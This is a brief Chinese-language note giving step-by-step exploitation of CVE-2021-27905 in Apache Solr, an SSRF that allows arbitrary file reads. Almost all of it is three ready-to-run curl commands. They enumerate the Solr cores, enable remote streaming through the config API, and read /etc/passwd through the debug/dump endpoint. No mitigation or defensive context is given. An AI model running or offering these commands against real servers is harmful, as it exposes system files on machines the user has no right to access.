【笔记】CVE-2021-27905漏洞利用

前言

Java的Solr框架利用SSRF实现任意文件读取漏洞利用

获取数据库名

1
curl http://<ip>:8983/solr/admin/cores?indexInfo=false&wt=json

触发

<database>:上一步获取的数据库名

1
curl -i -s -k -X $'POST' -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' $'http://<ip>:8983/solr/<database>/config'

读取文件

/etc/passwd:读取文件

1
curl -i -s -k 'http://<ip>:8983/solr/<database>/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

完成